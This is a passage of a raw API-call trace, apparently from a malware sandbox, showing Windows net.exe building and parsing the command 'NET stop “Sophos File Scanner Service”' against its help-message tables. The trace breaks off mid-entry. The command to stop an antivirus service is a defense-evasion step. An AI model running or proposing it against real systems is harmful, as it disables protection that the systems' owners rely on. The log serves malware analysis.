[0128.628] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0128.628] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0128.628] _wcsicmp (_String1="WORK", _String2="“Sophos") returned -8101 [0128.628] _wcsicmp (_String1="WORK", _String2="File") returned 17 [0128.628] _wcsicmp (_String1="WORK", _String2="Scanner") returned 4 [0128.628] _wcsicmp (_String1="WORK", _String2="Service”") returned 4 [0128.628] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0128.628] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0128.628] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0128.628] _wcsicmp (_String1="WKSTA", _String2="“Sophos") returned -8101 [0128.628] _wcsicmp (_String1="WKSTA", _String2="File") returned 17 [0128.628] _wcsicmp (_String1="WKSTA", _String2="Scanner") returned 4 [0128.628] _wcsicmp (_String1="WKSTA", _String2="Service”") returned 4 [0128.628] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0128.628] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0128.628] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0128.628] _wcsicmp (_String1="PRDR", _String2="“Sophos") returned -8108 [0128.628] _wcsicmp (_String1="PRDR", _String2="File") returned 10 [0128.628] _wcsicmp (_String1="PRDR", _String2="Scanner") returned -3 [0128.628] _wcsicmp (_String1="PRDR", _String2="Service”") returned -3 [0128.628] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0128.629] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0128.629] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0128.629] _wcsicmp (_String1="DEVRDR", _String2="“Sophos") returned -8120 [0128.629] _wcsicmp (_String1="DEVRDR", _String2="File") returned -2 [0128.629] _wcsicmp (_String1="DEVRDR", _String2="Scanner") returned -15 [0128.629] _wcsicmp (_String1="DEVRDR", _String2="Service”") returned -15 [0128.629] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0128.629] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0128.629] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0128.629] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0128.629] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0128.629] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0128.629] _wcsicmp (_String1="SVR", _String2="“Sophos") returned -8105 [0128.629] _wcsicmp (_String1="SVR", _String2="File") returned 13 [0128.629] _wcsicmp (_String1="SVR", _String2="Scanner") returned 19 [0128.629] _wcsicmp (_String1="SVR", _String2="Service”") returned 17 [0128.629] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0128.629] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0128.629] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0128.629] _wcsicmp (_String1="SRV", _String2="“Sophos") returned -8105 [0128.629] _wcsicmp (_String1="SRV", _String2="File") returned 13 [0128.629] _wcsicmp (_String1="SRV", _String2="Scanner") returned 15 [0128.629] _wcsicmp (_String1="SRV", _String2="Service”") returned 13 [0128.629] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0128.629] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x29f728, nSize=0x0, Arguments=0x29f724 | out: lpBuffer="哘0ꔺ盹") returned 0x1c [0128.629] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0128.630] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0128.630] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0128.630] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0128.630] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0128.630] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0128.630] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0128.630] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0128.630] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0128.630] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0128.630] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0128.630] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0128.630] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0128.631] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0128.632] GetFileType (hFile=0x0) returned 0x0 [0128.632] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x303ac0 [0128.632] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x303ac0, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0128.632] WriteFile (in: hFile=0x0, lpBuffer=0x303ac0, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x29f708, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f708, lpOverlapped=0x0) returned 0 [0128.632] LocalFree (hMem=0x303ac0) returned 0x0 [0128.632] GetFileType (hFile=0x0) returned 0x0 [0128.632] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3037c0 [0128.632] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3037c0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n0", lpUsedDefaultChar=0x0) returned 2 [0128.632] WriteFile (in: hFile=0x0, lpBuffer=0x3037c0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29f708, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f708, lpOverlapped=0x0) returned 0 [0128.632] LocalFree (hMem=0x3037c0) returned 0x0 [0128.632] wcscpy_s (in: _Destination=0x29f7c0, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0128.633] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0128.633] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0128.633] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0128.633] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="“Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos") returned 0x0 [0128.633] wcsncat_s (in: _Destination="NET stop “Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos ") returned 0x0 [0128.633] wcsncat_s (in: _Destination="NET stop “Sophos ", _SizeInWords=0x200, _Source="File", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos File") returned 0x0 [0128.633] wcsncat_s (in: _Destination="NET stop “Sophos File", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos File ") returned 0x0 [0128.633] wcsncat_s (in: _Destination="NET stop “Sophos File ", _SizeInWords=0x200, _Source="Scanner", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos File Scanner") returned 0x0 [0128.633] wcsncat_s (in: _Destination="NET stop “Sophos File Scanner", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos File Scanner ") returned 0x0 [0128.633] wcsncat_s (in: _Destination="NET stop “Sophos File Scanner ", _SizeInWords=0x200, _Source="Service”", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos File Scanner Service”") returned 0x0 [0128.633] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0댸å)Ѱå") returned 0xad [0128.633] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes |", _MaxCount=0x26) returned 18 [0128.633] LocalFree (hMem=0x305520) returned 0x0 [0128.633] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x2e [0128.633] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET COMPUTER\r\n\\\\computername {/ADD | /", _MaxCount=0x26) returned 16 [0128.633] LocalFree (hMem=0x305520) returned 0x0 [0128.633] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x7d [0128.633] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:ti", _MaxCount=0x26) returned 16 [0128.633] LocalFree (hMem=0x305520) returned 0x0 [0128.633] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x26 [0128.633] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r\n", _MaxCount=0x26) returned 16 [0128.633] LocalFree (hMem=0x305520) returned 0x0 [0128.633] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x19 [0128.633] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x26) returned 16 [0128.633] LocalFree (hMem=0x305520) returned 0x0 [0128.634] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x1b [0128.634] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x26) returned 13 [0128.634] LocalFree (hMem=0x305520) returned 0x0 [0128.634] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xbe [0128.634] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text\"", _MaxCount=0x26) returned 12 [0128.634] LocalFree (hMem=0x305520) returned 0x0 [0128.634] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x33 [0128.634] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET comm", _MaxCount=0x26) returned 11 [0128.634] LocalFree (hMem=0x305520) returned 0x0 [0128.634] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x19 [0128.634] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x26) returned 11 [0128.634] LocalFree (hMem=0x305520) returned 0x0 [0128.634] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xc1 [0128.634] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:\"", _MaxCount=0x26) returned 7 [0128.634] LocalFree (hMem=0x305520) returned 0x0 [0128.634] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x16 [0128.634] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x26) returned 3 [0128.634] LocalFree (hMem=0x305520) returned 0x0 [0128.634] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x33 [0128.635] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET SESSION\r\n[\\\\computername] [/DELETE", _MaxCount=0x26) returned 15 [0128.635] LocalFree (hMem=0x305520) returned 0x0 [0128.635] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x234 [0128.635] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET SHARE\r\nsharename\r\n sharen", _MaxCount=0x26) returned 12 [0128.635] LocalFree (hMem=0x305520) returned 0x0 [0128.635] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x13 [0128.635] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET START BROWSER\r\n", _MaxCount=0x26) returned 14 [0128.635] LocalFree (hMem=0x305520) returned 0x0 [0128.635] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x14 [0128.635] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x26) returned 14 [0128.635] LocalFree (hMem=0x305520) returned 0x0 [0128.635] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x14 [0128.635] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET START EVENTLOG\r\n", _MaxCount=0x26) returned 14 [0128.635] LocalFree (hMem=0x305520) returned 0x0 [0128.635] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x15 [0128.635] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET START MESSENGER\r\n", _MaxCount=0x26) returned 14 [0128.636] LocalFree (hMem=0x305520) returned 0x0 [0128.636] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x15 [0128.636] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET START NET LOGON\r\n", _MaxCount=0x26) returned 14 [0128.636] LocalFree (hMem=0x305520) returned 0x0 [0128.636] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x16 [0128.636] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x26) returned 14 [0128.636] LocalFree (hMem=0x305520) returned 0x0 [0128.636] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x11 [0128.636] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET START RPCSS\r\n", _MaxCount=0x26) returned 14 [0128.636] LocalFree (hMem=0x305520) returned 0x0 [0128.636] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x14 [0128.636] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET START SCHEDULE\r\n", _MaxCount=0x26) returned 14 [0128.636] LocalFree (hMem=0x305520) returned 0x0 [0128.636] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x12 [0128.636] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET START SERVER\r\n", _MaxCount=0x26) returned 14 [0128.636] LocalFree (hMem=0x305520) returned 0x0 [0128.636] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xf [0128.636] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET START UPS\r\n", _MaxCount=0x26) returned 14 [0128.636] LocalFree (hMem=0x305520) returned 0x0 [0128.636] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x17 [0128.636] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET START WORKSTATION\r\n", _MaxCount=0x26) returned 14 [0128.636] LocalFree (hMem=0x305520) returned 0x0 [0128.636] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x18 [0128.636] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x26) returned 14 [0128.636] LocalFree (hMem=0x305520) returned 0x0 [0128.636] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x2a [0128.636] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER]", _MaxCount=0x26) returned 14 [0128.636] LocalFree (hMem=0x305520) returned 0x0 [0128.637] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x15 [0128.637] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x26) returned 19 [0128.637] LocalFree (hMem=0x305520) returned 0x0 [0128.637] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x58 [0128.637] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN[", _MaxCount=0x26) returned -1 [0128.637] LocalFree (hMem=0x305520) returned 0x0 [0128.637] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x184 [0128.637] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET USE\r\n[devicename | *] [\\\\computern", _MaxCount=0x26) returned -2 [0128.637] LocalFree (hMem=0x305520) returned 0x0 [0128.637] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xc7 [0128.637] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET USER\r\n[username [password | *] [op", _MaxCount=0x26) returned -2 [0128.637] LocalFree (hMem=0x305520) returned 0x0 [0128.637] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x47 [0128.637] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | [", _MaxCount=0x26) returned -3 [0128.637] LocalFree (hMem=0x305520) returned 0x0 [0128.637] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xc2 [0128.637] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONFI", _MaxCount=0x26) returned 19 [0128.637] LocalFree (hMem=0x305520) returned 0x0 [0128.637] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x319 [0128.637] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="SERVICES\r\nNET START can be used to sta", _MaxCount=0x26) returned -5 [0128.637] LocalFree (hMem=0x305520) returned 0x0 [0128.637] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x483 [0128.637] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="SYNTAX\r\nThe following conventions are ", _MaxCount=0x26) returned -5 [0128.637] LocalFree (hMem=0x305520) returned 0x0 [0128.637] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xa86 [0128.638] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="NAMES\r\nThe following types of names ar", _MaxCount=0x26) returned 4 [0128.638] LocalFree (hMem=0x305520) returned 0x0 [0128.638] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x54 [0128.638] _wcsnicmp (_String1="NET stop “Sophos File Scanner Service”", _String2="\r\nFor more information on tools see th", _MaxCount=0x26) returned 97 [0128.638] LocalFree (hMem=0x305520) returned 0x0 [0128.638] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xad [0128.638] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{", _MaxCount=0x1d) returned 18 [0128.638] LocalFree (hMem=0x305520) returned 0x0 [0128.638] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x2e [0128.638] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET COMPUTER\r\n\\\\computername ", _MaxCount=0x1d) returned 16 [0128.638] LocalFree (hMem=0x305520) returned 0x0 [0128.638] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x7d [0128.638] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET CONFIG SERVER\r\n[/AUTODISC", _MaxCount=0x1d) returned 16 [0128.638] LocalFree (hMem=0x305520) returned 0x0 [0128.638] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x26 [0128.638] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET CONFIG\r\n[SERVER | WORKSTA", _MaxCount=0x1d) returned 16 [0128.638] LocalFree (hMem=0x305520) returned 0x0 [0128.638] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x19 [0128.638] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1d) returned 16 [0128.638] LocalFree (hMem=0x305520) returned 0x0 [0128.639] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x1b [0128.639] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1d) returned 13 [0128.639] LocalFree (hMem=0x305520) returned 0x0 [0128.639] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xbe [0128.639] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET GROUP\r\n[groupname [/COMME", _MaxCount=0x1d) returned 12 [0128.639] LocalFree (hMem=0x305520) returned 0x0 [0128.639] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x33 [0128.639] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET HELP\r\ncommand\r\n -or-\r", _MaxCount=0x1d) returned 11 [0128.639] LocalFree (hMem=0x305520) returned 0x0 [0128.639] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc14, 